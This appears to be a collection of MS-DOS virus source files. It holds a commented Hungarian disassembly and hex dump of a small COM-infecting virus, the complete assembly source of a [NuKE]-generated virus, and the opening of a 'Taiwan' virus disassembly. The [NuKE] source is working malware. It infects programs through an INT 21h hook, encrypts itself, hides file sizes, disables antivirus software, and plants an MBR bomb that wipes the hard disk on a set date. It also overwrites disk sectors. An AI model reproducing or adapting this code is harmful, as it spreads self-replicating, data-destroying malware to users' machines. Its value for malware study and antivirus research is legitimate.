28F8:020A 26 ES:
28F8:020B 3B45FE CMP AX,[DI-02] ; '.C' ?
28F8:020E 7403 JZ 0213 ;biztos hogy COM file!
28F8:0210 E98E00 JMP 02A1 ;nem COM ugr s az erede-
;ti INT 21h-ra
;File nyit sa
28F8:0213 B43D MOV AH,3D ;file nyit s
28F8:0215 B002 MOV AL,02 ;ˇr s/olvas s
28F8:0217 E89600 CALL 02B0 ;INT 21h hiv sa
28F8:021A 7303 JNB 021F ;ha nincs hiba
28F8:021C E98200 JMP 02A1 ;hiba esetn ugr s az
;eredeti INT 21h-ra
28F8:021F 8BD8 MOV BX,AX ;file kezel”
;File mret ellen”rzs
28F8:0221 B90000 MOV CX,0000
28F8:0224 BA0000 MOV DX,0000
28F8:0227 B002 MOV AL,02 ;file vgre
28F8:0229 B442 MOV AH,42 ;file pointer mozgat sa
28F8:022B E88200 CALL 02B0 ;INT 21h hiv sa
28F8:022E 3D00FE CMP AX,FE00
28F8:0231 736E JNB 02A1 ;ha nem nagyobb a file
;65024 byte-n l
28F8:0233 2D0300 SUB AX,0003 ;JMP+op hossza
;Fert”zend” file eredeti 4 byte j nak
;beolvas sa
28F8:0236 2E CS:
28F8:0237 A3BE02 MOV [02BE],AX ;let rolja
28F8:023A B442 MOV AH,42 ;file pointer mozgat sa
28F8:023C B000 MOV AL,00 ;file elejre
28F8:023E B90000 MOV CX,0000
28F8:0241 BA0000 MOV DX,0000
28F8:0244 E86900 CALL 02B0 ;INT 21h hiv sa
28F8:0247 B43F MOV AH,3F ;olvas s file-b˘l
28F8:0249 B90400 MOV CX,0004 ;4 byte
28F8:024C BAC102 MOV DX,02C1 ;ide tegye
28F8:024F 8CCF MOV DI,CS
28F8:0251 8EDF MOV DS,DI ;DS=CS
28F8:0253 E85A00 CALL 02B0 ;INT 21h hiv sa
28F8:0256 B005 MOV AL,05
28F8:0258 3A06C402 CMP AL,[02C4] ;utols˘ byte=5 ?
28F8:025C 7443 JZ 02A1 ;igen, ugr s az eredeti
;INT 21h -ra
;Fert”zend” file-ba a virusra
;mutat˘ JMP+op. kiˇr sa (4 byte)
28F8:025E B442 MOV AH,42 ;file pointer mozgat sa
28F8:0260 B000 MOV AL,00 ;file elejre
28F8:0262 B90000 MOV CX,0000
28F8:0265 8BD1 MOV DX,CX
28F8:0267 E84600 CALL 02B0 ;INT 21h hiv sa
28F8:026A B0E9 MOV AL,E9 ;JMP k˘dja
28F8:026C 2E CS:
28F8:026D A2BD02 MOV [02BD],AL ;let rolja
28F8:0270 B005 MOV AL,05
28F8:0272 2E CS:
28F8:0273 A2C002 MOV [02C0],AL
28F8:0276 B90400 MOV CX,0004 ;4 byte
28F8:0279 BABD02 MOV DX,02BD ;JMP + op. kezdete
28F8:027C 8CC8 MOV AX,CS
28F8:027E 8ED8 MOV DS,AX
28F8:0280 B440 MOV AH,40 ;kiˇr s file-ba
28F8:0282 E82B00 CALL 02B0 ;INT 21h hiv sa
;Program megfert”zse 0200h byte kiˇr sa
;azaz a virus m”gm sol sa
28F8:0285 B442 MOV AH,42 ;file pointer mozgat sa
28F8:0287 B002 MOV AL,02 ;file vgre
28F8:0289 B90000 MOV CX,0000
28F8:028C 8BD1 MOV DX,CX
28F8:028E E81F00 CALL 02B0 ;INT 21h hiv sa
28F8:0291 BA0001 MOV DX,0100 ;0100h ofset-t”l
28F8:0294 B90002 MOV CX,0200 ;0200h byte virus hossza
28F8:0297 B440 MOV AH,40 ;kiˇr s file-ba
28F8:0299 E81400 CALL 02B0 ;INT 21h hiv sa
28F8:029C B43E MOV AH,3E ;file z r sa
28F8:029E E80F00 CALL 02B0 ;INT 21h hiv sa
28F8:02A1 5E POP SI
28F8:02A2 5F POP DI
28F8:02A3 5A POP DX
28F8:02A4 59 POP CX
28F8:02A5 5B POP BX
28F8:02A6 58 POP AX
28F8:02A7 07 POP ES
28F8:02A8 1F POP DS
28F8:02A9 90 NOP
28F8:02AA 2E CS:
28F8:02AB FF2EB702 JMP FAR [02B7] ;eredeti INT 21h-ra
28F8:02AF CF IRET
;Eredeti INT 21h hiv sa
28F8:02B0 9C PUSHF ;elmenti mivel az IRET
;visszamenti a flag-eket
28F8:02B1 2E CS:
28F8:02B2 FF1EB702 CALL FAR [02B7] ;eredeti INT 21h hiv sa
28F8:02B6 C3 RET
28F8:02B7 16 PUSH SS
28F8:02B8 130C ADC CX,[SI]
28F8:02BA 0202 ADD AL,[BP+SI]
28F8:02BC 00E9 ADD CL,CH
28F8:02BE 06 PUSH ES
28F8:02BF 06 PUSH ES
28F8:02C0 05E906 ADD AX,06E9
28F8:02C3 0405 ADD AL,05
28F8:02C5 0100 ADD [BX+SI],AX
28F8:02C7 0000 ADD [BX+SI],AL
28F8:02C9 0001 ADD [BX+DI],AL
28F8:02CB F0 LOCK
28F8:02CC 0901 OR [BX+DI],AX
28F8:02CE 54 PUSH SP
28F8:02CF 7572 JNZ 0343
28F8:02D1 62 DB 62
28F8:02D2 6F DB 6F
28F8:02D3 204B75 AND [BP+DI+75],CL
28F8:02D6 6B DB 6B
28F8:02D7 61 DB 61
28F8:02D8 63 DB 63
28F8:02D9 2039 AND [BX+DI],BH
28F8:02DB 2E CS:
28F8:02DC 3920 CMP [BX+SI],SP
28F8:02DE 2020 AND [BX+SI],AH
28F8:02E0 2020 AND [BX+SI],AH
28F8:02E2 2024 AND [SI],AH
28F8:02E4 0000 ADD [BX+SI],AL
28F8:02FC 0000 ADD [BX+SI],AL
28F8:02FE FA CLI
28F8:02FF 00C7 ADD BH,AL
Megjegyzs:
Nagyon primitˇv virus, de megvan a maga zsenialit sa, kt legyet
<09>t egy csap sra, pl COPY parancs esetn megnyit egy com file-t,s
ha a virus a mem˘ri ban van, akkor mg a m soland˘ file-t megfer-
t”zi, s a COPY m r a fert”z”tt file-t m solja! Nem igaz n k r-
tkony vˇrus, puszt n minden<65>tt ott akar lenni, s nehezˇteni a
felhaszn l˘(k) munk j t! Mrete nagyon kicsi, mind”ssze 512 byte!
Hi nyoznak a vˇrusb˘l az (tapasztalataim szerint) eddigi virusok-
ban fellelhet” ellen”rzsek, gondolok itt arra, hogy ha megt”rtnik
egy file-ba (hoz) val˘ kiˇr s nem ellen”rzi a program hogy val˘ban
kiˇrta-e azt az X byte-ot. Tov bb  mikor rezidess (nem {hivatalo-
san} bejegyzetten) teszi mag t nem m˘dosˇtja az MCB. 13. byte-j n
lv” RAM tetejnek a paragrafus cˇmtt a saj t maga  lltal lefog-
lalt mrettel (kivon s!), mint PL. a Yankee Doodle! A Yankee mg
azt is megnzi, hogy amit meg akar fert”zni az az utols˘ mem˘.
blokkban van-e, b r abban kell lennie, mert a DOS egy programnak
odaadja a teljes szabad mem˘ri t, ami van...
DUMP:
28F8:0100 E8 00 00 90 5E 50 51 B0-21 B4 35 CD 21 8C C0 3D ....^PQ.!.5.!..=
28F8:0110 00 40 72 24 83 EE 03 BA-C1 02 81 EA 00 01 03 F2 .@r$............
28F8:0120 8B 1C 8B 4C 02 89 1E 00-01 89 0E 02 01 8C D8 8E ...L............
28F8:0130 C0 59 58 BB 00 01 FF E3-8C D8 48 8E D8 A1 03 00 .YX.......H.....
28F8:0140 2D 41 00 A3 03 00 8C C8-8E D8 A1 02 00 2D 00 08 -A...........-..
28F8:0150 8E C0 BF 00 01 83 EE 03-B9 00 02 F3 A4 8C 06 C7 ................
28F8:0160 02 B9 6C 01 89 0E C5 02-FF 2E C5 02 8C C1 8C D8 ..l.............
28F8:0170 26 A3 CB 02 B8 00 01 26-A3 C9 02 8C C0 8E D8 BA &......&........
28F8:0180 C7 01 B0 05 B4 25 CD 21-B4 35 B0 21 CD 21 2E 89 .....%.!.5.!.!..
28F8:0190 1E B7 02 8C C3 2E 89 1E-B9 02 B8 D9 01 8B D0 8B ................
28F8:01A0 C1 8E D8 B0 21 B4 25 CD-21 8B 16 C1 02 8B 0E C3 ....!.%.!.......
28F8:01B0 02 A1 CB 02 8E D8 89 16-00 01 89 0E 02 01 8E C0 ................
28F8:01C0 59 58 2E FF 2E C9 02 90-50 1E 52 8C C8 8E D8 BA YX......P.R.....
28F8:01D0 CE 02 B4 09 E8 D9 00 EB-F6 90 80 FC 3D 74 03 E9 ............=t..
28F8:01E0 C7 00 90 1E 06 50 53 51-52 57 56 8B FA 8C DE 8E .....PSQRWV.....
28F8:01F0 C6 B0 00 B9 32 00 FC F2-AE 83 EF 03 B8 4F 4D 26 ....2........OM&
28F8:0200 3B 05 74 03 E9 9A 00 B8-2E 43 26 3B 45 FE 74 03 ;.t......C&;E.t.
28F8:0210 E9 8E 00 B4 3D B0 02 E8-96 00 73 03 E9 82 00 8B ....=.....s.....
28F8:0220 D8 B9 00 00 BA 00 00 B0-02 B4 42 E8 82 00 3D 00 ..........B...=.
28F8:0230 FE 73 6E 2D 03 00 2E A3-BE 02 B4 42 B0 00 B9 00 .sn-.......B....
28F8:0240 00 BA 00 00 E8 69 00 B4-3F B9 04 00 BA C1 02 8C .....i..?.......
28F8:0250 CF 8E DF E8 5A 00 B0 05-3A 06 C4 02 74 43 B4 42 ....Z...:...tC.B
28F8:0260 B0 00 B9 00 00 8B D1 E8-46 00 B0 E9 2E A2 BD 02 ........F.......
28F8:0270 B0 05 2E A2 C0 02 B9 04-00 BA BD 02 8C C8 8E D8 ................
28F8:0280 B4 40 E8 2B 00 B4 42 B0-02 B9 00 00 8B D1 E8 1F .@.+..B.........
28F8:0290 00 BA 00 01 B9 00 02 B4-40 E8 14 00 B4 3E E8 0F ........@....>..
28F8:02A0 00 5E 5F 5A 59 5B 58 07-1F 90 2E FF 2E B7 02 CF .^_ZY[X.........
28F8:02B0 9C 2E FF 1E B7 02 C3 16-13 0C 02 02 00 E9 06 06 ................
28F8:02C0 05 E9 06 04 05 01 00 00-00 00 01 F0 09 01 ..............
;Kiˇrand˘ sz”veg kezdete
28F8:02C0 54 75 Tu
28F8:02D0 72 62 6F 20 4B 75 6B 61-63 20 39 2E 39 20 20 20 rbo Kukac 9.9
28F8:02E0 20 20 20 24 $
28F8:02E0 00 00 00 00-00 00 00 00 00 00 00 00 ............
28F8:02F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 FA 00 ................
28F8:0300 C7 .
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;

590
MSDOS/Virus.MSDOS.Unknown.turtle.asm Normal file
View File

@ -0,0 +1,590 @@
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
.286
code segment
assume cs:code,ds:code
org 100h
start: CALL NEXT
NEXT:
mov di,sp ;take the stack pointer location
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
sub bp,offset next ;subtract the large code off this code
;
;*******************************************************************
; #1 DECRYPT ROUTINE
;*******************************************************************
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
je crypt2 ;yes! not decrypt
;----------------------------------------------------------
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt]+ bp ;di = first byte to decrypt
mov dx,1 ;dx = value for decrypt
;----------------------------------------------------------
deci: ;deci = fuck label!
;----------------------------------------------------------
ÿinc di
inc di
;----------------------------------------------------------
jmp bye ;######## BYE BYE F-PROT ! ##########
mov ah,4ch
int 21h
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
;-----------------------------------------------------------
mov ah,0bh ;######### BYE BYE TBAV ! ##########
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
;----------------------------------------------------------
loop deci ;repeat please!
;
;*****************************************************************
; #2 DECRYPT ROUTINE
;*****************************************************************
;
crypt: ;fuck label!
;
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt2] + bp ;di = first byte to decrypt
;---------------------------------------------------------------
deci2: ;
xor byte ptr cs:[di],1 ;decrytion rutine
inc di ;very simple...
loop deci2 ;
;---------------------------------------------------------------
crypt2: ;fuck label!
;
MOV AX,0CACAH ;call to my resident interrup mask
INT 21H ;for chek "I'm is residet?"
CMP Bh,0CAH ;is equal to CACA?
JE PUM2 ;yes! jump to runnig program
call action
;*****************************************************************
; NRLG FUNCTIONS (SELECTABLE)
;*****************************************************************
ÿcall MBR
call TRASH_RN
call ANTI_V
;****************************************************************
; PROCESS TO REMAIN RESIDENT
;****************************************************************
mov ax,3521h
int 21h ;store the int 21 vectors
mov word ptr [bp+int21],bx ;in cs:int21
mov word ptr [bp+int21+2],es ;
;---------------------------------------------------------------
push cs ;
pop ax ;ax = my actual segment
dec ax ;dec my segment for look my MCB
mov es,ax ;
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
;---------------------------------------------------------------
push cs ;
pop es ;
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
sub bx,17 + offset fin ;and 100H for the PSP total
mov ah,4ah ;used memory
int 21h ;put the new value to MCB
;---------------------------------------------------------------
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
mov ah,48h ;
int 21h ;request the memory to fuck DOS!
;---------------------------------------------------------------
dec ax ;ax=new segment
mov es,ax ;ax-1= new segment MCB
mov byte ptr es:[1],8 ;put '8' in the segment
;--------------------------------------------------------------
inc ax ;
mov es,ax ;es = new segment
lea si,[bp + offset start] ;si = start of virus
mov di,100h ;di = 100H (psp position)
mov cx,offset fin - start ;cx = lag of virus
push cs ;
pop ds ;ds = cs
cld ;mov the code
rep movsb ;ds:si >> es:di
;--------------------------------------------------------------
mov dx,offset virus ;dx = new int21 handler
mov ax,2521h ;
push es ;
pop ds ;
int 21h ;set the vectors
;-------------------------------------------------------------
pum2: ;
;
mov ah,byte ptr [cs:bp + real] ;restore the 3
mov byte ptr cs:[100h],ah ;first bytes
mov ax,word ptr [cs:bp + real + 1] ;
mov word ptr cs:[101h],ax ;
;-------------------------------------------------------------
mov ax,100h ;
jmp ax ;jmp to execute
;
;*****************************************************************
;* HANDLER FOR THE INT 21H
;*****************************************************************
;
VIRUS: ;
;
cmp ah,4bh ;is a 4b function?
je REPRODUCCION ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
dirsal:
cmp AX,0CACAH ;is ... a caca function? (resident chek)
jne a3 ;no! jump to a3
mov bh,0cah ;yes! put ca in bh
a3: ;
JMP dword ptr CS:[INT21] ;jmp to original int 21h
ret ;
make db '[NuKE] N.R.L.G. AZRAEL'
dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION: ;
;
pushf ;put the register
pusha ;in the stack
push si ;
push di ;
push bp ;
push es ;
push ds ;
;-------------------------------------------------------------
push cs ;
pop ds ;
mov ax,3524H ;get the dos error control
int 21h ;interupt
mov word ptr error,es ;and put in cs:error
mov word ptr error+2,bx ;
mov ax,2524H ;change the dos error control
mov dx,offset all ;for my "trap mask"
int 21h ;
;-------------------------------------------------------------
pop ds ;
pop es ;restore the registers
pop bp ;
pop di ;
pop si ;
popa ;
popf ;
;-------------------------------------------------------------
pushf ;put the registers
pusha ;
push si ;HEY! AZRAEL IS CRAZY?
push di ;PUSH, POP, PUSH, POP
push bp ;PLEEEEEAAAAAASEEEEEEEEE
push es ;PURIFY THIS SHIT!
push ds ;
;-------------------------------------------------------------
mov ax,4300h ;
int 21h ;get the file
mov word ptr cs:[attrib],cx ;atributes
;-------------------------------------------------------------
mov ax,4301h ;le saco los atributos al
xor cx,cx ;file
int 21h ;
;-------------------------------------------------------------
mov ax,3d02h ;open the file
int 21h ;for read/write
mov bx,ax ;bx=handle
;-------------------------------------------------------------
mov ax,5700h ;
int 21h ;get the file date
mov word ptr cs:[hora],cx ;put the hour
mov word ptr cs:[dia],dx ;put the day
and cx,word ptr cs:[fecha] ;calculate the seconds
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
jne seguir ;yes! the file is infected!
jmp cerrar ;
;------------------------------------------------------------
seguir: ;
mov ax,4202h ;move the pointer to end
call movedor ;of the file
;------------------------------------------------------------
push cs ;
pop ds ;
sub ax,3 ;calculate the
mov word ptr [cs:largo],ax ;jmp long
;-------------------------------------------------------------
mov ax,04200h ;move the pointer to
call movedor ;start of file
;----------------------------------------------------------
push cs ;
pop ds ;read the 3 first bytes
mov ah,3fh ;
mov cx,3 ;
lea dx,[cs:real] ;put the bytes in cs:[real]
int 21h ;
;----------------------------------------------------------
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
jne er1 ;yes! is a EXE... fuckkk!
;----------------------------------------------------------
jmp cerrar
er1:
;----------------------------------------------------------
mov ax,4200h ;move the pointer
call movedor ;to start fo file
;----------------------------------------------------------
push cs ;
pop ds ;
mov ah,40h ;
mov cx,1 ;write the JMP
lea dx,[cs:jump] ;instruccion in the
int 21h ;fist byte of the file
;----------------------------------------------------------
mov ah,40h ;write the value of jmp
mov cx,2 ;in the file
lea dx,[cs:largo] ;
int 21h ;
;----------------------------------------------------------
mov ax,04202h ;move the pointer to
call movedor ;end of file
;----------------------------------------------------------
push cs ;
pop ds ;move the code
push cs ;of my virus
pop es ;to cs:end+50
cld ;for encrypt
mov si,100h ;
mov di,offset fin + 50 ;
mov cx,offset fin - 100h ;
rep movsb ;
;----------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
enc: ;
xor byte ptr cs:[di],1 ;encrypt the virus
inc di ;code
loop enc ;
;---------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
mov dx,1
enc2: ;
ÿinc di
inc di ;the virus code
loop enc2 ;
;--------------------------------------------
mov ah,40h ;
mov cx,offset fin - offset start ;copy the virus
mov dx,offset fin + 50 ;to end of file
int 21h ;
;----------------------------------------------------------
cerrar: ;
;restore the
mov ax,5701h ;date and time
mov cx,word ptr cs:[hora] ;file
mov dx,word ptr cs:[dia] ;
or cx,word ptr cs:[fecha] ;and mark the seconds
int 21h ;
;----------------------------------------------------------
mov ah,3eh ;
int 21h ;close the file
;----------------------------------------------------------
pop ds ;
pop es ;restore the
pop bp ;registers
pop di ;
pop si ;
popa ;
popf ;
;----------------------------------------------------------
pusha ;
;
mov ax,4301h ;restores the atributes
mov cx,word ptr cs:[attrib] ;of the file
int 21h ;
;
popa ;
;----------------------------------------------------------
pushf ;
pusha ; 8-( = f-prot
push si ;
push di ; 8-( = tbav
push bp ;
push es ; 8-) = I'm
push ds ;
;----------------------------------------------------------
mov ax,2524H ;
lea bx,error ;restore the
mov ds,bx ;errors handler
lea bx,error+2 ;
int 21h ;
;----------------------------------------------------------
pop ds ;
pop es ;
pop bp ;restore the
pop di ;resgisters
pop si ;
popa ;
popf ;
;----------------------------------------------------------
JMP A3 ;jmp to orig. INT 21
;
;**********************************************************
; SUBRUTINES AREA
;**********************************************************
;
movedor: ;
;
xor cx,cx ;use to move file pointer
xor dx,dx ;
int 21h ;
ret ;
;----------------------------------------------------------
all: ;
;
XOR AL,AL ;use to set
iret ;error flag
;***********************************************************
; DATA AREA
;***********************************************************
largo dw ?
jump db 0e9h
real db 0cdh,20h,0
hora dw ?
dia dw ?
attrib dw ?
int21 dd ?
error dd ?
ÿ;---------------------------------
action: ;
MOV AH,2AH ;
INT 21H ;get date
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
JE cont ;nop! fuck ret
cmp byte ptr cs:[action_dia+bp],32 ;
jne no_day ;
cont: ;
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
je set ;
cmp byte ptr cs:[action_mes+bp],13 ;
jne NO_DAY ;nop! fuck ret
set: ;
mov ax,351ch ;
int 21h ;store the int 1ch vectors
mov word ptr [trampaint+bp],bx ;in cs:trampaint
mov word ptr [trampaint+2+bp],es ;
mov ax,251ch ;put the int 1ch (clock) vector
push cs ;
pop ds ;
mov dx,offset tardar ;in offset tardar
int 21h ;
mov dx,offset fin ;
int 27h ;main resident the code
NO_DAY: ;
ret ;ret for program
tardar: ;int 1c handler
pushf ;
pusha ;
mov cx,0ffffh ;fuck loop for slow speed
trampa: ;
mov ax,ax ;
loop trampa ;
popa ;
popf ;
JMP dword ptr CS:[trampaint+bp] ;jmp to original int 1ch
ret ;
trampaint dd ? ;
;--------------------------------;
ÿMBR:
;**************************************
; Start of MBR-BOMB writing
;**************************************
mov ax,9f80h ;very high memory
mov es,ax ;good for buffer
mov ax,0201h ;read the original
mov cx,0001h ;MBR of the disk
mov dx,0080h ;
xor bx,bx ;to buffer 9f80:0000h
int 13h ;
push cs ;
pop ds ;
mov ax,9f80h ;add my MBR-BOMB
mov es,ax ;to real MBR in my
mov si,offset fat ;buffer
xor di,di ;
mov cx,105 ;ds:[fat]=>9f80:0000h
repe movsb ;total 105bytes
mov ax,9f80h ;
mov es,ax ;
xor bx,bx ;replace the original
mov ax,0301h ;MBR in the disk by the
xor ch,ch ;new MBR-BOMB.
mov dx,0080h ;
mov cl,1 ;WARNING! VSAFE/MSAVE
mov bx,0 ;NOTIFY THIS ACTION
int 13h ;
ret ;
;---------------------------------------------------
;*********************
; Start of MBR code
;*********************
fat: ;
cli ;#
xor ax,ax ;#
mov ss,ax ;#
mov sp,7C00h ;#
mov si,sp ;#
push ax ;#
pop es ;#
push ax ;#
pop ds ;#
sti ;#
;#
pushf ;#
push ax ;#
push cx ;# = This code be in the
push dx ;# original MBR
push ds ;# (NOT MODIFY)
push es ;#
MOV AH,04H ; Read real tyme
INT 1AH ; Clock
CMP DH,cs:byte ptr action_mes ; is Month?
JE CAGO ; yes! SNIF SNIF HD.
lit:
pop es
pop ds
pop dx
pop cx
pop ax
popf
jmp booti
CAGO:
;++++++++++++++++++++++++++++++++++++++++++++++++++++
; START OF YOUR DESTRUCTIVE CODE (or not destructive)
;++++++++++++++++++++++++++++++++++++++++++++++++++++
rip_hd:
;@
xor dx, dx ;@
rip_hd1: ;@
mov cx, 2 ;@
mov ax, 311h ;@
mov dl, 80h ;@
mov bx, 5000h ;@
mov es, bx ;@
int 13h ;@
jae rip_hd2 ;@
xor ah, ah ;@
int 13h ;@
rip_hd2: ;@
inc dh ;@
cmp dh, 4 ;@
jb rip_hd1 ;@
inc ch ;@
jmp rip_hd
;+++++++++++++++++++++++++++++++++++++++++++
; END OF YOUR DESTRUCUTIVE CODE
;+++++++++++++++++++++++++++++++++++++++++++
booti:
xor ax,ax ;#
mov es,ax ;#
mov bx,7c00h ;#
mov ah,02 ;#
mov al,1 ;#
mov cl,1 ;# #= This code be
mov ch,0 ;# in the original
mov dh,1 ;# MBR
mov dl,80h ;# (NOT MODIFY)
;#
int 13h ;#
;#
db 0eah,00,7ch,00,00 ;#
;*******************
; END OF MBR CODE
;*******************
ÿ;---------------------------------
TRASH_RN: ;
MOV AH,2DH ;
INT 21H ;get date
CMP Dl,6 ;is =6 (RAN 0-99)
jne NO_DAYY ;nop! fuck ret
mov ah,0dh ;
int 21h ;reset disk
mov al,2 ;
mov cx,0ffffh ;
mov dx,0 ;
int 26h ;fuck ffffh sector
mov ah,0dh ;reste disk
int 21h ;
mov al,2 ;
mov cx,0ffffh ;
mov dx,0ffffh ;new fuck+
int 26h ;heheheh!!!
NO_DAYY: ;
ret ;
;---------------------------------
ÿ;---------------------------------
ANTI_V: ;
MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY
MOV DX,5945H ;
INT 21H ;
ret ;
;---------------------------------
ÿ;*****************************************************
dir_s:
pushf
push cs
call a3 ;Get file Stats
test al,al ;Good FCB?
jnz no_good ;nope
push ax
push bx
push es
mov ah,51h ;Is this Undocmented? huh...
int 21h
mov es,bx
cmp bx,es:[16h]
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;Get file DTA
int 21h
pop ax
inc al
jnz fcb_okay
add bx,7h
fcb_okay: mov ax,es:[bx+17h]
and ax,1fh ;UnMask Seconds Field
xor al,byte ptr cs:fechad
jnz not_infected
and byte ptr es:[bx+17h],0e0h
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
sbb es:[bx+1fh],ax
not_infected:pop es
pop bx
pop ax
no_good: iret
;********************************************************************
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
;*********************************************************************
ÿaction_dia Db 01H ;day for the action
action_mes Db 01H ;month for the action
FECHA DW 01eH ;Secon for mark
FECHAd Db 01eH ;Secon for mark dir st
fin:
code ends
end start

407
MSDOS/Virus.MSDOS.Unknown.tw.asm Normal file
View File

@ -0,0 +1,407 @@
PAGE 60,132
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Progrming Research Group T.R.A.U.M.A. º
; º Universidade Autonoma de Lisboa º
; º The 'Taiwan' Virus º
; º Disassembled by J.L. and J.C, Feb 1990 º
; º º
; º Not Copyrighted (c) Jean Luz. º
; º º
; º This listing is only to be made available to TRAUMA researchers º
; º º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.1
data_1e equ 58h ; (0000:0058=0A9Ch)
data_2e equ 5Ah ; (0000:005A=0D81h)
data_3e equ 475h ; (0000:0475=2)
data_7e equ 95h ; (76AC:0095=0A1h)
data_8e equ 96h ; (76AC:0096=58h)
data_9e equ 98h ; (76AC:0098=44A3h)
data_10e equ 9Ah ; (76AC:009A=2601h)
data_11e equ 9Eh ; (76AC:009E=0)
data_12e equ 114h ; (76AC:0114=0BAh)
data_13e equ 13Eh ; (76AC:013E=9Eh)
data_14e equ 13Fh ; (76AC:013F=0)
data_15e equ 140h ; (76AC:0140=21CDh)
data_16e equ 142h ; (76AC:0142=0B4h)
data_17e equ 143h ; (76AC:0143=3Dh)
data_18e equ 144h ; (76AC:0144=2B0h)
data_19e equ 146h ; (76AC:0146=9EBAh)
data_20e equ 148h ; (76AC:0148=0)
data_21e equ 14Bh ; (76AC:014B=8Bh)
data_22e equ 17Ah ; (76AC:017A=40h)
code_seg_a segment
assume cs:code_seg_a, ds:code_seg_a
tw proc far
jmp short loc_a
db 0B0h, 67h, 3Ch, 67h
db 0CFh, 2Ah, 2Eh, 63h, 6Fh, 6Dh
db 0, 2Ah, 0, 5Ch, 0, 2Eh
db 2Eh, 0, 0, 5Ch, 0
db 31h
db 40 dup (0)
db 64h, 0, 0, 0, 50h, 10h
db 0, 0FCh, 0,
loc_a: jmp short loc_1
db 0EDh
db 0D8h, 0CFh, 0CFh, 0DEh, 0C3h, 0C4h
db 0CDh, 0D9h, 8Ah, 0CCh, 0D8h, 0C5h
db 0C7h, 8Ah, 0E4h, 0CBh, 0DEh, 0C3h
db 0C5h, 0C4h, 0CBh, 0C6h, 8Ah, 0E9h
db 0CFh, 0C4h, 0DEh, 0D8h, 0CBh, 0C6h
db 8Ah, 0FFh, 0C4h, 0C3h, 0DCh, 0CFh
db 0D8h, 0D9h, 0C3h, 0DEh, 0D3h, 8Ah
db 8Bh, 0Ah, 0Dh, 24h, 0E3h, 0D9h
db 8Ah, 0DEh, 0C5h, 0CEh, 0CBh, 0D3h
db 8Ah, 0D9h, 0DFh, 0C4h, 0C4h, 0D3h
db 8Ah, 95h
db 0Ah, 0Dh, 24h
loc_1:
cli ; Disable interrupts
push es
mov ax,0
mov es,ax
;
; To begin, let's read and change some interrupts - replacing one with other
;
mov ax,es:data_1e ; (0000:0058=0A9Ch)
mov ds:data_18e,ax ; (76AC:0144=2B0h)
mov ax,es:data_2e ; (0000:005A=0D81h)
mov ds:data_19e,ax ; (76AC:0146=9EBAh)
mov word ptr es:data_1e,102h ; (0000:0058=0A9Ch)
mov es:data_2e,cs ; (0000:005A=0D81h)
pop es
;
; now reprogram the primary interrupt controller (the only one on the PC/XT)
in al,21h ; port 21h, 8259-1 int IMR
or al,2
out 21h,al ; port 21h, 8259-1 int comands
sti ; Enable interrupts
